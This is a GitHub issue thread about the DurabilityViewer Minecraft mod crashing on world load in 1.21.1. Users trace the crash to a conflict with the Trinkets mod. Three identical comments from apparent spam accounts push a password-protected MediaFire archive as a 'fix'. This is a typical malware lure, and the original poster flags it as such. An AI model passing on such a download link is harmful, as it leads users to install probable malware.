### ISSUE TITLE
Durability viewer crashing on game load  Version 1.21.1

### ISSUE THREAD

**Issue by keatit71** [fantahund/DurabilityViewer#5]
Game crashes on trying to load into a world.

``
[latest.log](https://github.com/user-attachments/files/16823690/latest.log)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by keatit71** [comment]
virus bots don;t open the links.

**Comment by kennethsible** [comment]
I also crashed with the same stacktrace upon joining a world on 1.21. After some ablating, I found that there's a conflict with [Trinkets](https://modrinth.com/mod/trinkets). @keatit71 Are you also using Trinkets?

**Comment by keatit71** [comment]
Yeah I'm using trinkets, I'll try without it.

**Comment by keatit71** [comment]
Yeah that fixes it but it seems like the mods meant to be compatible with trinkets according to its settings so hope this gets fixed.

**Comment by juxstified** [comment]
Getting the same crash error with Accessories with Trinkets Compatibility Layer mod.

**Comment by Netlighter** [comment]
i guess similar bug was on original mod and fixed, so maybe author could check this out

https://github.com/gbl/DurabilityViewer/issues/83

**Comment by D10King** [comment]
having the same issue now, here is the crash report I received while playing in 1.21.1:

https://mclo.gs/elsMNt2

**Comment by darkralts** [comment]
just replace the last two blocks at the very end with that
